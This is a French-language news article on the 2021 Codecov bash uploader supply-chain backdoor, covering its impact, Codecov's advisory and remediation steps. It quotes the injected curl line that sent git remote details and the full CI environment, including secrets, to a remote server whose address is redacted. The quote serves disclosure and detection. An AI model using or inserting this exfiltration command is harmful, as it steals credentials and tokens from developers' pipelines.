Home » Un outil de développement de porte dérobée qui a volé des informations d’identification a échappé à la notification pendant 3 mois

Un outil de développement de porte dérobée qui a volé des informations d’identification a échappé à la notification pendant 3 mois

by Les Actualites

Getty Images

Un outil de développement logiciel accessible au public contenait un code malveillant qui volait les informations d’authentification dont les applications ont besoin pour accéder aux ressources sensibles. C’est la dernière révélation d’une attaque de la chaîne d’approvisionnement qui a le potentiel de détourner les réseaux d’innombrables organisations.

Le téléchargeur Codecov bash contenait la porte dérobée de fin janvier à début avril, ont déclaré jeudi les développeurs de l’outil. La porte dérobée a amené les ordinateurs des développeurs à envoyer des jetons d’authentification secrets et d’autres données sensibles à un site distant contrôlé par les pirates. Le programme de téléchargement fonctionne avec des plates-formes de développement telles que Github Actions, CircleCI et Bitrise Step, qui prennent toutes en charge ces jetons d’authentification secrets dans l’environnement de développement.

Une pile d’informations AWS et d’autres informations d’identification cloud

Le téléchargeur Codecov bash effectue ce que l’on appelle la couverture de code pour les projets de développement logiciel à grande échelle. Il permet aux développeurs d’envoyer des rapports de couverture qui, entre autres, déterminent dans quelle mesure une base de code a été testée par des scripts de test internes. Certains projets de développement intègrent Codecov et des services tiers similaires dans leurs plates-formes, où il existe un accès gratuit aux informations d’identification sensibles qui peuvent être utilisées pour voler ou modifier le code source.

Un code similaire à cette seule ligne est apparu pour la première fois le 31 janvier:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

Le code envoie à la fois l'emplacement du référentiel GitHub et l'ensemble de l'environnement de processus au site distant, qui a été expurgé car Codecov dit qu'il fait partie d'une enquête fédérale en cours. Ces types d'environnement stockent généralement des jetons, des informations d'identification et d'autres secrets pour les logiciels dans Amazon Web Services ou GitHub.

Armé de ces secrets, il ne manque pas de choses malveillantes qu'un attaquant pourrait faire aux environnements de développement qui reposaient sur l'outil, a déclaré HD Moore, un expert en sécurité et PDG de la plateforme de découverte de réseau Rumble.

«Cela dépend vraiment de ce qu'il y avait dans l'environnement, mais à partir du moment où les attaquants avaient accès (via le téléchargeur bash), ils auraient pu installer des portes dérobées sur les systèmes sur lesquels il fonctionnait», a-t-il écrit dans un message direct avec Ars . "Pour GitHub / CircleCI, cela aurait principalement exposé le code source et les informations d'identification."

Moore a poursuivi:

Les attaquants se sont probablement retrouvés avec une pile d'informations AWS et d'autres informations d'identification cloud en plus de jetons qui pourraient leur donner accès à des référentiels privés, qui incluent le code source mais aussi tous les autres éléments pour lesquels le jeton était autorisé. À l'extrême, ces informations d'identification se perpétueraient d'elles-mêmes: les attaquants utilisent un jeton GitHub volé pour créer une porte dérobée sur le code source, qui vole ensuite les données client en aval, etc. Si les informations d'identification le permettaient, elles pourraient permettre la reprise de l'infrastructure, l'accès à la base de données, l'accès aux fichiers, etc.

Dans l'avis de jeudi, Codecov a déclaré que la version malveillante du téléchargeur bash pouvait accéder:

  • Tous les identifiants, jetons ou clés que nos clients transmettaient via leur runner CI (intégration continue) qui seraient accessibles lorsque le script de téléchargement bash a été exécuté
  • Tous les services, banques de données et code d'application accessibles avec ces informations d'identification, jetons ou clés
  • Les informations git remote (URL du référentiel d'origine) des référentiels utilisant les uploaders bash pour télécharger la couverture vers Codecov dans CI

"Sur la base des résultats de l'enquête médico-légale à ce jour, il semble qu'il y ait eu un accès non autorisé périodique à une clé Google Cloud Storage (GCS) à partir du 31 janvier 2021, ce qui a permis à un tiers malveillant de modifier une version de notre script de téléchargement bash pour potentiellement exporter des informations soumises à une intégration continue vers un serveur tiers », a déclaré Codecov. "Codecov a sécurisé et corrigé le script le 1er avril 2021."

L'avis de Codecov a déclaré qu'un bogue dans le processus de création d'images Docker de Codecov permettait au pirate d'extraire les informations d'identification requises pour modifier le script de téléchargement bash.

La falsification a été découverte le 1er avril par un client qui a remarqué que le shasum qui agit comme une empreinte numérique pour confirmer l'intégrité du téléchargeur bash ne correspondait pas au shasum de la version téléchargée à partir de https://codecov.io/bash. Le client a contacté Codecov, et le fabricant d'outils a retiré la version malveillante et a lancé une enquête.

Codecov exhorte tous ceux qui ont utilisé le programme de mise à jour bash pendant la période concernée à révoquer toutes les informations d'identification, jetons ou clés situés dans les processus CI et à en créer de nouveaux. Les développeurs peuvent déterminer les clés et les jetons stockés dans un environnement CI en exécutant le env commande dans le pipeline CI. Tout ce qui est sensible doit être considéré comme compromis.

De plus, toute personne qui utilise une version stockée localement du téléchargeur bash doit la vérifier pour les éléments suivants:

Curl -sm 0.5 -d “$(git remote -v)

Si ces commandes apparaissent n'importe où dans un téléchargeur bash stocké localement, les utilisateurs doivent immédiatement remplacer le téléchargeur par la version la plus récente de https://codecov.io/bash.

Codecov a déclaré que les développeurs utilisant une version auto-hébergée de la mise à jour bash ne seraient probablement pas affectés. «Pour être impacté, votre pipeline CI devrait récupérer le téléchargeur bash à partir de https://codecov.io/bash au lieu de votre installation Codecov auto-hébergée. Vous pouvez vérifier d'où vous récupérez le téléchargeur bash en examinant la configuration de votre pipeline CI », a déclaré la société.

L'attrait des attaques de la chaîne d'approvisionnement

Le compromis du système de développement et de distribution de logiciels de Codecov est la dernière attaque de la chaîne d'approvisionnement à être découverte. En décembre, un compromis similaire a frappé SolarWinds, le fabricant d'outils de gestion de réseau à Austin, au Texas, utilisé par environ 300 000 organisations à travers le monde, y compris des entreprises Fortune 500 et des agences gouvernementales.

Les pirates qui ont commis la brèche ont ensuite distribué une mise à jour détournée qui a été téléchargée par environ 18 000 clients. Environ 10 agences fédérales américaines et 100 entreprises privées ont finalement reçu des charges utiles de suivi qui ont envoyé des informations sensibles aux serveurs contrôlés par les attaquants. FireEye, Microsoft, Mimecast et Malwarebytes ont tous été balayés dans la campagne.

Plus récemment, des pirates ont mené une attaque de la chaîne d'approvisionnement logicielle qui a été utilisée pour installer des logiciels malveillants de surveillance sur les ordinateurs des personnes utilisant NoxPlayer, un logiciel qui émule le système d'exploitation Android sur les PC et les Mac, principalement pour que les utilisateurs puissent jouer à des jeux mobiles sur ces plates-formes. . Une version backdoor de NoxPlayer était disponible pendant cinq mois, ont déclaré des chercheurs d'ESET.

L'attrait des attaques de la chaîne d'approvisionnement pour les pirates informatiques est leur ampleur et leur efficacité. En compromettant un seul acteur dans l'offre logicielle, les pirates peuvent potentiellement infecter toute personne ou organisation qui utilise le produit compromis. Une autre caractéristique que les pirates trouvent bénéfique: il y a souvent peu ou rien que les cibles peuvent faire pour détecter les logiciels malveillants distribués de cette manière, car les signatures numériques indiqueront que c'est légitime.

Dans le cas de la version de mise à jour de bash à porte dérobée, cependant, il aurait été facile pour Codecov ou l'un de ses clients de détecter la malveillance en ne faisant rien de plus que de vérifier le shasum. La possibilité pour la version malveillante d'échapper à l'avis pendant trois mois indique que personne n'a pris la peine d'effectuer cette simple vérification.

Les personnes qui ont utilisé le programme de mise à jour bash entre le 31 janvier et le 1er avril doivent inspecter attentivement leurs versions de développement pour détecter tout signe de compromis en suivant les étapes décrites dans l'avis de jeudi.

You may also like

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.